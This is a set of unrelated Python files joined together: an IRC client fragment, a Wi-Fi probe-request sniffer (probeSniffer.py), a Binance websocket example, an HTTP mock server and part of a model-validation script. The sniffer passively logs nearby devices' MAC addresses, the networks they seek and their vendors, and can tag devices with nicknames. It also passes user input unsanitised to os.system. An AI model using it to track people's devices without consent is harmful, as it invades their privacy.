self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(260) # TODO: Settings
self.sock.connect((server, port))
self.send('NICK {}'.format(nick))
self.send('USER {} 0 * :{}'.format(user or nick, name or nick))
self.channels = {}
def send(self, text):
# TODO: Make sure not longer than 512
self.sock.send((text + '\r\n').encode('UTF-8'))
self.log('>{}'.format(text), raw=True)
return text
def sendcmd(self, cmd, params=[], msg=None):
if len(params): cmd += ' ' + ' '.join(params)
if msg is not None: cmd += ' :' + msg
return self.send(cmd)
def mainloop(self):
buffer = b''
while True:
try:
buffer += self.sock.recv(2048)
except socket.timeout:
pass # should reconnect
lines = buffer.split(b'\r\n')
buffer = lines.pop()
for line in lines:
line = line.decode('utf-8', 'replace') # TODO: Encoding settings
self.log('<{}'.format(line), raw=True)
self.handle_message(line)
def handle_message(self, message):
matched = re.match(IRCRE, message)
nick, user, host, cmd, params, msg = matched.groups()
if hasattr(self, 'on'+cmd):
handler = getattr(self,'on'+cmd)
handler(nick, user, host, cmd, (params or '').split(' '), msg)
def onPING(self, nick, user, host, cmd, params, msg):
self.sendcmd('PONG', msg=msg)
class Client(IRC):
def __init__(self, server, port, nick, user=None, name=None):
self.nick = nick
self.master = tk.Tk()
self.rawlog = tk.Text(self.master, state=tk.DISABLED)
self.rawlog.pack(fill=tk.BOTH, expand=1)
self.chanbox = tk.Listbox(self.master)
self.chanbox.pack(fill=tk.Y, side=tk.LEFT)
self.chanbox.bind('<<ListboxSelect>>', self.chanboxclick)
self.nickbox = tk.Listbox(self.master)
self.nickbox.pack(fill=tk.Y, side=tk.RIGHT)
self.chatlog = tk.Text(self.master, state=tk.DISABLED)
self.chatlog.pack(fill=tk.BOTH, expand=1)
self.activechan = tk.Label(self.master, text=name)
self.activechan.pack(side=tk.LEFT)
self.chatbox = tk.Entry(self.master)
self.chatbox.pack(fill=tk.X, side=tk.BOTTOM)
self.chatbox.focus_set()
self.master.bind('<Return>', self.chatboxsend)
self.cur_chan = self.nick
self.connect(server, port, nick, user, name)
def chanboxclick(self, event):
sel = self.chanbox.curselection()
self.set_chan(sorted(self.channels)[sel[0]])
def chatboxsend(self, event):
msg = self.chatbox.get()
self.chatbox.delete(0, tk.END)
if not msg.startswith('/'):
self.log('{} <{}> {}'.format(self.cur_chan, self.nick, msg))
self.sendcmd('PRIVMSG', [self.cur_chan], msg)
return
split = msg[1:].split(' ', 2)
command = split[0].lower()
if command in ('join', 'j'):
self.sendcmd('JOIN', [split[1]])
elif command in ('part', 'p', 'leave'):
chan = self.cur_chan if len(split) < 2 else split[1]
self.sendcmd('PART', [chan])
elif command in ('msg', 'pm'):
self.sendcmd('PRIVMSG', [split[1]], split[2])
elif command in ('quit', 'q', 'exit'):
self.sendcmd('QUIT')
sys.exit()
elif command in ('raw', 'quote'):
self.send(msg[1:].split(' ',1)[1])
elif command in ('names', 'nicks', 'users'):
self.log(', '.join(self.channels[self.cur_chan]))
elif command in ('chan', 'channel', 'chans', 'channels', 'listchans'):
if len(split) < 2:
self.log(', '.join(self.channels))
self.log('Type /chan #channel to switch active channels')
elif split[1] in self.channels:
self.set_chan(split[1])
else:
self.log('')
else:
self.log("UNKNOWN COMMAND: {}".format(command))
def log(self, text, raw=False):
log = self.rawlog if raw else self.chatlog
log.config(state=tk.NORMAL)
log.insert(tk.END, datetime.now().strftime('[%H:%M] ') + text + '\n')
log.config(state=tk.DISABLED)
log.see(tk.END)
def onPRIVMSG(self, nick, user, host, cmd, params, msg):
self.log('{} <{}> {}'.format(params[0], nick, msg))
def onJOIN(self, nick, user, host, cmd, params, msg):
channel = params[0]
self.log('{} has joined {} ({}@{})'.format(nick, channel, user, host))
if nick == self.nick:
self.channels[channel] = []
self.update_chans()
self.set_chan(channel)
if nick not in self.channels[channel]:
self.channels[channel].append(nick)
if channel == self.cur_chan:
self.update_nicks()
def onPART(self, nick, user, host, cmd, params, msg):
channel = params[0]
self.log('{} has parted {} ({}@{})'.format(nick, channel, user, host))
if nick == self.nick:
self.channels.pop(channel)
print(sorted(self.channels))
if channel == self.cur_chan:
self.set_chan(sorted(self.channels)[0])
self.update_chans()
else:
self.channels[channel].remove(nick)
if channel == self.cur_chan:
self.update_nicks()
def onQUIT(self, nick, user, host, cmd, params, msg):
for channel in self.channels:
if nick not in self.channels[channel]:
continue
self.channels[channel].remove(nick)
if channel == self.cur_chan:
self.update_nicks()
def on353(self, nick, user, host, cmd, params, msg):
for nick in msg.split(' '):
nick = nick.lstrip('@+') # TODO: Pull from server meta
if nick not in self.channels[params[2]]:
self.channels[params[2]].append(nick)
def on366(self, nick, user, host, cmd, params, msg):
self.update_nicks()
def set_chan(self, channel):
self.cur_chan = channel
self.activechan.config(text=self.cur_chan)
self.update_nicks()
def update_nicks(self):
self.nickbox.delete(0, tk.END)
for nick in sorted(self.channels[self.cur_chan]):
self.nickbox.insert(tk.END, nick)
def update_chans(self):
self.chanbox.delete(0, tk.END)
for channel in sorted(self.channels):
self.chanbox.insert(tk.END, channel)
def main():
with open('config.json', 'r') as f:
config = json.loads(f.read())
client = Client(config['serv'], config['port'],
config['nick'], config['user'], config['name'])
client.sendcmd('JOIN', [config['chan']])
x = threading.Thread(target=client.mainloop)
x.daemon = True
x.start()
client.master.mainloop()
if __name__ == '__main__':
main()
|
probeSniffer.py
|
#!/usr/bin/env python3
# -.- coding: utf-8 -.-
import os
import time
import sys
sys.path.append('/home/bayscideaswaimea/.local/bin/scapy')
sys.path.append('/home/bayscideaswaimea/.local/lib/python3.5/site-packages')
print(sys.path)
import sqlite3
import threading
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import datetime
import urllib.request as urllib2
import argparse
parser = argparse.ArgumentParser(usage="probeSniffer.py interface [-h] [-d] [-b] [--nosql] [--addnicks] [--flushnicks] [--debug]")
parser.add_argument("interface", help='Interface (in monitor mode) for capturing the packets')
parser.add_argument("-d", action='store_true', help='do not show duplicate requests')
parser.add_argument("-b", action='store_true', help='do not show \'broadcast\' requests (without ssid)')
parser.add_argument("-f", type=str, help='only show requests from the specified mac address')
parser.add_argument("--nosql", action='store_true', help='disable SQL logging completely')
parser.add_argument("--addnicks", action='store_true', help='add nicknames to mac addresses')
parser.add_argument("--flushnicks", action='store_true', help='flush nickname database')
parser.add_argument("--debug", action='store_true', help='turn debug mode on')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.d:
showDuplicates = False
else:
showDuplicates = True
if args.b:
showBroadcasts = False
else:
showBroadcasts = True
if args.nosql:
noSQL = True
else:
noSQL = False
if args.addnicks:
addNicks = True
else:
addNicks = False
if args.flushnicks:
flushNicks = True
else:
flushNicks = False
if args.debug:
debugMode = True
else:
debugMode = False
if args.f != None:
filterMode = True
filterMac = args.f
else:
filterMode = False
monitor_iface = args.interface
alreadyStopping = False
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget(devices):
sys.stdout.write("Devices found: [" + str(devices) + "]")
restart_line()
sys.stdout.flush()
print("[W] Make sure to use an interface in monitor mode!\n")
devices = []
script_path = os.path.dirname(os.path.realpath(__file__))
script_path = script_path + "/"
externalOptionsSet = False
if noSQL:
externalOptionsSet = True
print("[I] NO-SQL MODE!")
if showDuplicates == False:
externalOptionsSet = True
print("[I] Not showing duplicates...")
if showBroadcasts == False:
externalOptionsSet = True
print("[I] Not showing broadcasts...")
if filterMode == True:
externalOptionsSet = True
print("[I] Only showing requests from '" + filterMac + "'.")
if externalOptionsSet:
print()
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
if not noSQL:
# nosql
pass
def stop():
global alreadyStopping
debug("stoping called")
if not alreadyStopping:
debug("setting stopping to true")
alreadyStopping = True
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
return
def debug(msg):
if debugMode:
print("[DEBUG] " + msg)
def chopping():
while True:
if not alreadyStopping:
channel = 1
while channel <= 12:
os.system("iwconfig " + monitor_iface + " channel " + str(channel) + " > /dev/null 2>&1")
debug("[CHOPPER] HI IM RUNNING THIS COMMAND: " + "iwconfig " + monitor_iface + " channel " + str(channel))
debug("[CHOPPER] HI I CHANGED CHANNEL TO " + str(channel))
channel = channel + 1
time.sleep(5)
else:
debug("[CHOPPER] IM STOPPING TOO")
sys.exit()
def sniffer():
global alreadyStopping
while True:
if not alreadyStopping:
try:
debug("[SNIFFER] HI I STARTED TO SNIFF")
sniff(iface=monitor_iface, prn=PacketHandler, store=0)
except:
print("[!] An error occurred. Debug:")
print(traceback.format_exc())
print("[!] Restarting in 5 sec... Press CTRL + C to stop.")
time.sleep(5)
else:
debug("[SNIFFER] IM STOPPING TOO")
sys.exit()
def PacketHandler(pkt):
try:
debug("packethandler - called")
if pkt.haslayer(Dot11):
debug("packethandler - pkt.haslayer(Dot11)")
if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
debug("packethandler - if pkt.type")
PrintPacket(pkt)
debug("packethandler - printPacket called and done")
except KeyboardInterrupt:
debug("packethandler - keyboardinterrupt")
stop()
exit()
except:
debug("packethandler - exception")
stop()
exit()
pass
def PrintPacket(pkt):
statusWidget(len(devices))
debug("printpacket started")
ssid = pkt.getlayer(Dot11ProbeReq).info.decode("utf-8")
if ssid == "":
nossid = True
debug("no ssid in request... skipping")
debug(str(pkt.addr2) + " " + str(pkt.addr1))
else:
nossid = False
print_source = pkt.addr2
url = "https://macvendors.co/api/vendorname/"
# Mac address to lookup vendor from
mac_address = print_source
try:
debug("url request started")
request = urllib2.Request(url + mac_address, headers={'User-Agent': "API Browser"})
response = urllib2.urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
except KeyboardInterrupt:
stop()
exit()
except:
vendor = "No Vendor (INTERNET ERROR)"
inDevices = False
for device in devices:
if device == mac_address:
inDevices = True
if not inDevices:
devices.append(mac_address)
debug("vendor request done")
nickname = getNickname(print_source)
if filterMode:
if mac_address != filterMac:
return
if not nossid:
try:
debug("sql duplicate check started")
if not noSQL:
if not checkSQLDuplicate(ssid, mac_address):
debug("not duplicate")
debug("saving to sql")
saveToMYSQL(mac_address, vendor, ssid)
debug("saved to sql")
if nickname == False:
print(print_source + " (" + vendor + ") ==> '" + ssid + "'")
else:
print(print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> '" + ssid + "'")
else:
if showDuplicates:
debug("duplicate")
if nickname == False:
print("[D] " + print_source + " (" + vendor + ") ==> '" + ssid + "'")
else:
print("[D] " + print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> '" + ssid + "'")
else:
if nickname == False:
print(print_source + " (" + vendor + ") ==> '" + ssid + "'")
else:
print(print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> '" + ssid + "'")
except KeyboardInterrupt:
stop()
exit()
except:
pass
else:
if showBroadcasts:
if nickname == False:
print(print_source + " (" + vendor + ") ==> BROADCAST")
else:
print(print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> BROADCAST")
statusWidget(len(devices))
def SQLConncetor():
try:
debug("sqlconnector called")
global db
db = sqlite3.connect("DB-probeSniffer.db")
cursor = db.cursor()
return cursor
except KeyboardInterrupt:
stop()
exit()
except:
debug("[!!!] CRASH IN SQLConncetor")
debug(traceback.format_exc())
pass
def checkSQLDuplicate(ssid, mac_add):
try:
debug("[1] checkSQLDuplicate called")
cursor = SQLConncetor()
cursor.execute("select count(*) from probeSniffer where ssid = ? and mac_address = ?", (ssid, mac_add))
data = cursor.fetchall()
data = str(data)
debug("[2] checkSQLDuplicate data: " + str(data))
db.close()
if data == "[(0,)]":
return False
else:
return True
except KeyboardInterrupt:
stop()
exit()
except:
debug("[!!!] CRASH IN checkSQLDuplicate")
debug(traceback.format_exc())
pass
def saveToMYSQL(mac_add, vendor, ssid):
try:
debug("saveToMYSQL called")
cursor = SQLConncetor()
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
cursor.execute("INSERT INTO probeSniffer VALUES (?, ?, ?, ?)", (mac_add, vendor, ssid, st))
db.commit()
db.close()
except KeyboardInterrupt:
stop()
exit()
except:
debug("[!!!] CRASH IN saveToMYSQL")
debug(traceback.format_exc())
pass
def setNickname(mac, nickname):
debug("setNickname called")
cursor = SQLConncetor()
cursor.execute("INSERT INTO probeSnifferNicknames VALUES (?, ?)", (mac, nickname))
db.commit()
db.close()
def getNickname(mac):
debug("getNickname called")
cursor = SQLConncetor()
cursor.execute("SELECT nickname FROM probeSnifferNicknames WHERE mac = ?", (mac,))
data = cursor.fetchone()
db.close()
if data == None:
return False
else:
data = data[0]
data = str(data)
return data
def main():
global alreadyStopping
if not noSQL:
print("[I] Setting up SQLite...")
try:
setupDB = sqlite3.connect("DB-probeSniffer.db")
except:
print("\n[!] Cant connect to database. Permission error?\n")
exit()
setupCursor = setupDB.cursor()
if flushNicks:
try:
setupCursor.execute("DROP TABLE probeSnifferNicknames")
print("\n[I] Nickname database flushed.\n")
except:
print("\n[!] Cant flush nickname database, since its not created yet\n")
setupCursor.execute("CREATE TABLE IF NOT EXISTS probeSniffer (mac_address VARCHAR(50),vendor VARCHAR(50),ssid VARCHAR(50),date VARCHAR(50))")
setupCursor.execute("CREATE TABLE IF NOT EXISTS probeSnifferNicknames (mac VARCHAR(50),nickname VARCHAR(50))")
setupDB.commit()
setupDB.close()
if addNicks:
print("\n[NICKNAMES] Add nicknames to mac addresses.")
while True:
print()
mac = input("[?] Mac address: ")
if mac == "":
print("[!] Please enter a mac address.")
continue
nick = input("[?] Nickname for mac '" + str(mac) + "': ")
if nick == "":
print("[!] Please enter a nickname.")
continue
setNickname(mac, nick)
addAnother = input("[?] Add another nickname? Y/n: ")
if addAnother.lower() == "y" or addAnother == "":
pass
else:
break
print("[I] Starting channelhopper in a new thread...")
path = os.path.realpath(__file__)
chopper = threading.Thread(target=chopping)
chopper.daemon = True
chopper.start()
print("[I] Saving requests to 'DB-probeSniffer.db'")
print("\n[I] Sniffing started... Please wait for requests to show up...\n")
statusWidget(len(devices))
snifferthread = threading.Thread(target=sniffer)
snifferthread.daemon = True
snifferthread.start()
try:
while not alreadyStopping:
pass
except KeyboardInterrupt:
alreadyStopping = True
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
except OSError:
print("[!] An error occurred. Debug:")
print(traceback.format_exc())
print("[!] Restarting in 5 sec... Press CTRL + C to stop.")
try:
time.sleep(5)
except:
alreadyStopping = True
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
if not alreadyStopping:
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
if __name__ == "__main__":
main()
|
example_userdata_stream_new_style.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_userdata_stream_new_style.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
# configure api key and secret for binance.com
api_key = ""
api_secret = ""
# create instances of BinanceWebSocketApiManager
ubwa_com = BinanceWebSocketApiManager(exchange="binance.com")
# create the userData streams
user_stream_id = ubwa_com.create_stream('arr', '!userData', api_key=api_key, api_secret=api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com,))
worker_thread.start()
# configure api key and secret for binance.com Isolated Margin
api_key = ""
api_secret = ""
# create instances of BinanceWebSocketApiManager
ubwa_com_im = BinanceWebSocketApiManager(exchange="binance.com-isolated_margin")
# create the userData streams
user_stream_id_im = ubwa_com_im.create_stream('arr', '!userData', symbols="trxbtc", api_key=api_key, api_secret=api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com_im,))
worker_thread.start()
# monitor the streams
while True:
ubwa_com.print_stream_info(user_stream_id)
ubwa_com_im.print_stream_info(user_stream_id_im)
time.sleep(1)
|
MockServer.py
|
import http.server
from threading import Thread, Barrier
from functools import partial
class _WebMockServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass # avoid logging
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes("Example", "utf8"))
class MockServer(object):
def __init__(self):
self.__server = None
self.__thread = None
def start_mock_server(self, port: int):
print("Starting server on port", port)
self.__server = http.server.HTTPServer(("", port), _WebMockServer)
def serve_forever(server):
with server:
server.serve_forever()
self.__thread = Thread(target=serve_forever, args=(self.__server, ))
self.__thread.setDaemon(True)
self.__thread.start()
def stop_mock_server(self):
print("Stopping server")
if self.__server is not None:
self.__server.shutdown()
self.__thread.join()
self.__server = None
self.__thread = None
|
validation.py
|
# Copyright (c) 2019 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The validation code used in train.py.
This script can also be called to run validation on previously generated checkpoints.
See the README for more information.
"""
import tensorflow as tf
import os
import re
import time
import json
import argparse
import sys
import csv
from collections import OrderedDict
import importlib
from glob import glob
from pathlib import Path
import threading
import train
import log as logging
from Datasets import data as dataset
from Datasets import imagenet_dataset
from tensorflow.python import ipu
from ipu_utils import get_config
from tensorflow.python.ipu.scopes import ipu_scope
from tensorflow.python.ipu import loops, ipu_infeed_queue, ipu_outfeed_queue
import tensorflow.contrib.compiler.xla as xla
from tensorflow.python.ipu.ops import cross_replica_ops
from tensorflow.python.ipu import horovod as hvd
import popdist
import popdist.tensorflow
import configurations
import relative_timer
DATASET_CONSTANTS = dataset.DATASET_CONSTANTS
MLPERF_EVAL_TARGET = 75.9
class LatencyThread:
def __init__(self, valid, total_batches):
self.thread = None
self.valid = valid
self.total_batches = total_batches
self.latency_sum = 0.
self.start = self.__fake_start
self.__start_if_not_compiled = self.__real_start
def __fake_start(self):
pass
def __real_start(self):
self.thread = threading.Thread(target=self.compute_latency)
self.thread.start()
def __setup_real_start(self):
self.start = self.__real_start
self.__start_if_not_compiled = self.__fake_start
def join(self):
# call to first join indicates compilation complete
# call start thread and setup real start
self.__start_if_not_compiled()
self.__setup_real_start()
self.thread.join()
def compute_latency(self):
num_batches = 0
self.latency_sum = 0
while num_batches < self.total_batches:
latencies = self.valid.session.run(self.valid.ops['latency_per_batch'])
num_batches += latencies.shape[0]
self.latency_sum += latencies.sum()
def get_latency(self):
return self.latency_sum/self.total_batches if self.total_batches != 0 else -0.001
def validation_graph_builder(model, data_dict, opts):
train.ipuside_preprocessing(data_dict, opts, training=False)
image, label = data_dict['image'], data_dict['label']
logits = model(opts, training=False, image=image)
predictions = tf.argmax(logits, 1, output_type=tf.int32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predictions, label), tf.float16))
return accuracy
def validation_graph(model, opts):
if "no_reconfigure" in opts and opts["no_reconfigure"]:
reconfigure = False
else:
reconfigure = True
if opts['use_popdist'] and reconfigure:
hvd.init()
valid_graph = tf.Graph()
with valid_graph.as_default():
# datasets must be defined outside the ipu device scope
valid_dataset = dataset.data(opts, is_training=False).map(lambda x: {'data_dict': x})
valid_iterator = ipu_infeed_queue.IPUInfeedQueue(valid_dataset,
prefetch_depth=opts['prefetch_depth'])
if opts['latency']:
timestamp_queue = ipu_outfeed_queue.IPUOutfeedQueue()
with ipu_scope('/device:IPU:0'):
def comp_fn():
def body(total_accuracy, data_dict):
accuracy = validation_graph_builder(model, data_dict, opts)
if opts['latency']:
timestamp_enqueue = timestamp_queue.enqueue(data_dict['timestamp'])
return (total_accuracy + (tf.cast(accuracy, tf.float32) / opts["validation_batches_per_step"]),
timestamp_enqueue)
else:
return total_accuracy + (tf.cast(accuracy, tf.float32) / opts["validation_batches_per_step"])
accuracy = loops.repeat(int(opts["validation_batches_per_step"]),
body, [tf.constant(0, tf.float32)], valid_iterator)
if opts['total_replicas']*opts['shards'] > 1 and not opts.get('inference', False):
accuracy = cross_replica_ops.cross_replica_sum(accuracy) / (opts['total_replicas']*opts['shards'])
return accuracy
(accuracy,) = xla.compile(comp_fn, [])
accuracy = 100 * accuracy
if opts['latency']:
print(f'relative_timer start {relative_timer.get_start()}')
timestamp = tf.cast(tf.timestamp() - relative_timer.get_start(), tf.float32)
latency_per_batch = tf.reshape(timestamp - timestamp_queue.dequeue(), [-1])
else:
latency_per_batch = None
valid_saver = tf.train.Saver()
ipu.utils.move_variable_initialization_to_cpu()
valid_init = tf.global_variables_initializer()
if opts['use_popdist']:
broadcast_weights = []
for var in tf.global_variables():
broadcast_weights.append(var.assign(hvd.broadcast(var, root_rank=0)))
total_batch_size_ph = tf.placeholder(dtype=tf.int32, shape=())
broadcast_total_batch_size = hvd.broadcast(total_batch_size_ph, root_rank=0)
num_files_ph = tf.placeholder(dtype=tf.int32, shape=())
broadcast_num_files = hvd.broadcast(num_files_ph, root_rank=0)
iteration_ph = tf.placeholder(dtype=tf.int32, shape=())
broadcast_iteration = hvd.broadcast(iteration_ph, root_rank=0)
else:
broadcast_weights = None
broadcast_total_batch_size, total_batch_size_ph = None, None
broadcast_num_files, num_files_ph = None, None
broadcast_iteration, iteration_ph = None, None
globalAMP = None
if opts["available_memory_proportion"] and len(opts["available_memory_proportion"]) == 1:
globalAMP = opts["available_memory_proportion"][0]
ipu_options = get_config(ipu_id=opts["select_ipu"],
prng=False, # Randomness in validation decreases performance!
shards=opts['shards'],
number_of_replicas=opts['total_replicas'],
max_cross_replica_buffer_size=opts["max_cross_replica_buffer_size"],
fp_exceptions=opts["fp_exceptions"],
half_partials=opts["enable_half_partials"],
conv_dithering=opts["enable_conv_dithering"],
enable_recomputation=opts["enable_recomputation"],
seed=opts["seed"],
availableMemoryProportion=globalAMP,
stable_norm=opts["stable_norm"],
compile_only=opts["compile_only"],
internalExchangeOptimisationTarget=opts[
"internal_exchange_optimisation_target"
],
num_io_tiles=opts["num_io_tiles"],
number_of_distributed_batch_norm_replicas=opts.get("BN_span", 1),
nanoo=not opts["saturate_on_overflow"],
)
if opts['use_popdist'] and reconfigure:
ipu_options = popdist.tensorflow.set_ipu_config(ipu_options, opts['shards'], configure_device=False)
if opts['on_demand'] and reconfigure:
ipu_options.device_connection.enable_remote_buffers = True
ipu_options.device_connection.type = ipu.utils.DeviceConnectionType.ON_DEMAND
if reconfigure:
ipu_options.configure_ipu_system()
valid_sess = tf.Session(graph=valid_graph, config=tf.ConfigProto())
ops = {'accuracy': accuracy,
'broadcast_weights': broadcast_weights,
'broadcast_total_batch_size': broadcast_total_batch_size,
'broadcast_num_files': broadcast_num_files,
'broadcast_iteration': broadcast_iteration,
'latency_per_batch': latency_per_batch}
placeholders = {'total_batch_size': total_batch_size_ph,
'num_files': num_files_ph,
'iteration': iteration_ph}
valid_graph.finalize()
return train.GraphOps(valid_graph, valid_sess, valid_init, ops, placeholders, valid_iterator, None, valid_saver)
def validation_run(valid, filepath, i, epoch, first_run, opts, latency_thread):
run = True
if filepath:
valid.saver.restore(valid.session, filepath)
name = filepath.split('/')[-1]
csv_path = os.path.join(opts['logs_path'], 'validation.csv')
if os.path.exists(csv_path):
with open(csv_path, 'rU') as infile:
# read the file as a dictionary for each row ({header : value})
reader = csv.DictReader(infile)
for row in reader:
if row['name'] == name:
run = False
print('Skipping validation run on checkpoint: {}'.format(name))
break
else:
name = None
if run:
if opts['use_popdist']:
# synchronise the model weights across all instances
valid.session.run(valid.ops['broadcast_weights'])
logging.mlperf_logging(key="EVAL_START", log_type="start",
metadata={"epoch_num": round(epoch)})
# Gather accuracy statistics
accuracy = 0.0
# start latency thread
latency_thread.start()
start = relative_timer.now()
for __ in range(opts["validation_iterations"]):
try:
a = valid.session.run(valid.ops['accuracy'])
except tf.errors.OpError as e:
if opts['compile_only'] and 'compilation only' in e.message:
print("Validation graph successfully compiled")
print("Exiting...")
sys.exit(0)
raise tf.errors.ResourceExhaustedError(e.node_def, e.op, e.message)
accuracy += a
val_time = relative_timer.now() - start
accuracy /= opts["validation_iterations"]
# wait for all dequeues and latency computation
latency_thread.join()
latency = latency_thread.get_latency()
valid_format = (
"Validation top-1 accuracy [{name}] (iteration: {iteration:6d}, epoch: {epoch:6.2f}, img/sec: {img_per_sec:6.2f},"
" time: {val_time:8.6f}, latency (ms): {latency:8.4f},"
" raw accuracy: {raw_acc:6.3f}%): {val_acc:6.3f}%")
val_size = (opts["validation_iterations"] *
opts["validation_batches_per_step"] *
opts["validation_total_batch_size"])
count = int(DATASET_CONSTANTS[opts['dataset']]['NUM_VALIDATION_IMAGES'])
raw_accuracy = accuracy
if count < val_size:
accuracy = accuracy * val_size / count
stats = OrderedDict([
('name', name),
('iteration', i),
('epoch', epoch),
('val_acc', accuracy),
('raw_acc', raw_accuracy),
('val_time', val_time),
('val_size', val_size),
('img_per_sec', val_size / val_time),
('latency', latency * 1000),
])
logging.print_to_file_and_screen(valid_format.format(**stats), opts)
logging.write_to_csv(stats, first_run, False, opts)
if opts["wandb"] and opts["distributed_worker_index"] == 0:
logging.log_to_wandb(stats)
logging.mlperf_logging(key="EVAL_STOP", log_type="stop",
metadata={"epoch_num": round(epoch)})
logging.mlperf_logging(
key="EVAL_ACCURACY", value=float(stats["val_acc"])/100,
metadata={"epoch_num": round(epoch)})
return stats
def initialise_validation(model, opts):
# -------------- BUILD GRAPH ------------------
valid = validation_graph(model.Model, opts)
# ------------- INITIALIZE SESSION -----------
valid.session.run(valid.iterator.initializer)
with valid.graph.as_default():
valid.session.run(valid.init)
return valid
def validation_only_process(model, opts):
valid = initialise_validation(model, opts)
ckpt_pattern_idx = re.compile(".*ckpt-([0-9]+).index$")
ckpt_pattern = re.compile(".*ckpt-([0-9]+)$")
if opts["restore_path"] and opts['distributed_worker_index'] == 0:
if os.path.isdir(opts["restore_path"]):
# search to a maximum depth of 1
ckpts = glob(os.path.join(opts["restore_path"], '*.index')) \
+ glob(os.path.join(opts["restore_path"], 'ckpt', '*.index'))
training_ckpts = sorted([c for c in ckpts if ckpt_pattern_idx.match(c)],
key=lambda x: int(ckpt_pattern_idx.match(x).groups()[0]))
weight_avg_ckpts = [c for c in ckpts if not ckpt_pattern_idx.match(c)]
filenames = training_ckpts + weight_avg_ckpts
filenames = [f[:-len(".index")] for f in filenames]
else:
filenames = sorted([f[:-len(".index")] for f in glob(opts['restore_path'] + '*.index')])
possible_args = os.path.join(opts["restore_path"], 'arguments.json')
if os.path.isfile(possible_args):
with open(os.path.join(opts["restore_path"], 'arguments.json'), 'r') as fp:
try:
total_batch_size = json.load(fp)['total_batch_size']
except KeyError:
total_batch_size = opts['batch_size']
else:
total_batch_size = opts['batch_size']
else:
filenames = [None]
total_batch_size = opts['batch_size']
num_files = len(filenames)
if opts['use_popdist']:
total_batch_size, num_files = valid.session.run(
[valid.ops['broadcast_total_batch_size'],
valid.ops['broadcast_num_files']],
feed_dict={valid.placeholders['total_batch_size']: total_batch_size,
valid.placeholders['num_files']: num_files}
)
if opts['distributed_worker_index'] == 0:
print(filenames)
total_samples = (opts['replicas'] *
opts['shards'] *
opts['validation_batches_per_step'] *
opts["validation_iterations"]
if opts['latency'] else 0)
latency_thread = LatencyThread(valid, total_samples)
success = False
# Validation block
logging.mlperf_logging(key="BLOCK_START", log_type="start",
metadata={"first_epoch_num": 1,
